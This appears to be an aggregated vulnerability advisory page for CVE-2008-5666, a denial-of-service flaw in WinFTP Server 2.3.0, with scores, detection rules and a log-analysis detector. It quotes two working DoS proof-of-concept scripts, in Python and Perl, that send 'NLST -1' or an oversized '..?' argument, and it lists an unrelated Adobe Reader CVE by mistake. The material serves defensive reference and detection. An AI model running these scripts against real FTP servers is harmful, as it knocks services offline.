CVE-2008-5666
Published 2008-12-19
Priority: P4 · 19 · low · 3.5 (CVSS 2.0)
Vector: AV:N/AC:M/Au:S/C:N/I:N/A:P
EXPLOIT
EPSS: 20.59% (97.2th percentile)
WinFTP FTP Server 2.3.0, when passive (aka PASV) mode is used, allows remote authenticated users to cause a denial of service via a sequence of FTP sessions that include an invalid "NLST -1" command.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wftpserver | winftp_ftp_server | — | — |
Detection & IOCs
- Detect repeated FTP sessions that send PASV followed immediately by `NLST -1`; this is the exact sequence that triggers the DoS in passive mode.
- Alert on FTP NLST commands containing the argument `-1`, especially when preceded by a PASV command in the same session, targeting winftpsrv.exe.
- Monitor for rapid, looping FTP connection attempts (a sleep of 0.2 seconds between sessions) that send PASV and `NLST -1`, which is indicative of automated DoS exploitation.
- Even anonymous FTP accounts can trigger this DoS if they have NLST permission; flag anonymous logins followed by `NLST -1` on WinFTP 2.3.0 servers.
- A secondary exploit variant uses a long repeated `..?` pattern (~35000 repetitions) as the NLST argument; detect abnormally long NLST argument strings on port 21.
- The DoS is triggered only when passive (PASV) mode is in use; the vulnerability does not apply to active-mode FTP sessions.
- Authentication is required, but the privilege bar is low: anonymous accounts with NLST permission are sufficient to exploit this vulnerability.
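The log-side checks listed above, combined into one pass over FTP command records, as an added example that is not part of the advisory or of any referenced project. The log format, the thresholds and the sample lines (documentation-range addresses) are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample of FTP control-channel records. Assumed log format:
# "<epoch-seconds> <client-ip> <session-id> <command line>".
SAMPLE_LOG = """\
100.0 192.0.2.5 s1 USER anonymous
100.1 192.0.2.5 s1 PASV
100.1 192.0.2.5 s1 NLST -1
100.1 192.0.2.5 s1 QUIT
100.3 192.0.2.5 s2 USER anonymous
100.3 192.0.2.5 s2 PASV
100.3 192.0.2.5 s2 NLST -1
100.5 192.0.2.5 s3 USER anonymous
100.5 192.0.2.5 s3 PASV
100.5 192.0.2.5 s3 NLST -1
200.0 192.0.2.9 s4 USER alice
200.1 192.0.2.9 s4 PASV
200.2 192.0.2.9 s4 NLST
300.0 192.0.2.7 s5 USER test
300.1 192.0.2.7 s5 NLST """ + "..?" * 400 + "\n"

MAX_NLST_ARG = 512   # assumed cut-off for an "abnormally long" NLST argument
BURST_SESSIONS = 3   # assumed: this many flagged sessions from one client ...
BURST_WINDOW = 5.0   # ... within this many seconds counts as a loop

def analyze(log_text):
    """Return (rule, client_ip, session_id) alerts in log order."""
    alerts, last_cmd, hits = [], {}, defaultdict(list)
    for line in log_text.splitlines():
        m = re.match(r"(\S+) (\S+) (\S+) (\S+) ?(.*)", line)
        if not m:
            continue  # skip records that do not fit the assumed format
        ts, ip, sid = float(m[1]), m[2], m[3]
        verb, arg = m[4].upper(), m[5].strip()
        if verb == "NLST":
            if len(arg) > MAX_NLST_ARG:
                alerts.append(("long_nlst_arg", ip, sid))
            # PASV immediately followed by "NLST -1" in the same session
            if arg == "-1" and last_cmd.get((ip, sid)) == "PASV":
                alerts.append(("pasv_nlst_-1", ip, sid))
                hits[ip].append(ts)
                recent = [t for t in hits[ip] if ts - t <= BURST_WINDOW]
                if len(recent) == BURST_SESSIONS:
                    alerts.append(("dos_loop", ip, sid))
        last_cmd[(ip, sid)] = verb
    return alerts

if __name__ == "__main__":
    print(*analyze(SAMPLE_LOG), sep="\n")
```

An ordinary passive-mode listing (session s4) raises nothing; only the `-1` argument directly after PASV and the over-long argument are flagged.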
CVSS provenance
- nvd · v2.0 · 3.5 · LOW · AV:N/AC:M/Au:S/C:N/I:N/A:P
- vendor_redhat · 6.2 · MEDIUM
GHSA
CVE-2008-5666 [LOW] GHSA-wxv2-27rf-hx46: WinFTP FTP Server 2
ghsa_unreviewed · 2022-05-17
WinFTP FTP Server 2.3.0, when passive (aka PASV) mode is used, allows remote authenticated users to cause a denial of service via a sequence of FTP sessions that include an invalid "NLST -1" command.
Red Hat
CVE-2007-5666 [MEDIUM] acroread JavaScript Insecure Library Search Path
vendor_redhat · 2008-02-08 · CVSS 6.2
Untrusted search path vulnerability in Adobe Reader and Acrobat 8.1.1 and earlier allows local users to execute arbitrary code via a malicious Security Provider library in the reader's current working directory. NOTE: this issue might be subsumed by CVE-2008-0655.
No detection rules found.
Exploit-DB
CVE-2008-5666 WinFTP Server 2.3.0 - 'PASV Mode' Remote Denial of Service
exploitdb · 2008-10-09
---
```python
# WinFTP v2.3.0 DoS exploit
# WinFTP URL - http://www.wftpserver.com/
# DoS'ed when try to send data
# (x)dmnt
# -*- coding: windows-1252 -*-
import socket
import time
import sys

PORT = 21

def help_info():
    print ("Usage: winftp \n")
    print ("Note: anonymous is enought\n")

def conn(hostname, username, passwd):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, PORT))
    except:
        print ("[+] Done!")
        sys.exit(1)
    r=sock.recv(1024)
    print "[+] " + r
    sock.send("USER %s\n" %username)
    sock.send("PASS %s\n" %passwd)
    sock.send("PASV\n")
    sock.send("NLST -1\n")
    sock.send("QUIT\n")
    sock.close()

print ("\n[WinFTP v2.3.0 remote DoS exploit]")
print ("[(x)dmnt 2008 without any clue :)]\n\n")
if len(sys.ar
```
Exploit-DB
CVE-2008-5666 WinFTP Server 2.3.0 - 'NLST' Denial of Service
exploitdb · 2008-09-26
---
```perl
#!/usr/bin/perl
############
#
# Simple Dos Crap for the winftpsrv.exe v.2.3.0
# by Julien Bedard
#
####################################
use Net::FTP;

$wftpsrvaddr = "255.255.255.255";
$overflow = "..?" x 35000;
$user = "test";
$pass = "test";
$port = 21;

$ftp = Net::FTP->new("$wftpsrvaddr", Debug => 0) || die "Cannot connect to ftp server: $@";
$ftp->login($user,$pass) || die "Cannot login ", $ftp->message;
$ftp->nlst($overflow);
$ftp->quit;
# milw0rm.com [2008-09-26]
```
Metasploit
WinFTP 2.3.0 NLST Denial of Service
metasploit
This module is a very rough port of Julien Bedard's PoC. You need a valid login, but even anonymous can do it if it has permission to call NLST.
- http://secunia.com/advisories/32209
- http://securityreason.com/securityalert/4785
- http://www.securitytracker.com/id?1021040
- http://www.vupen.com/english/advisories/2008/2801
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45806
- https://www.exploit-db.com/exploits/6717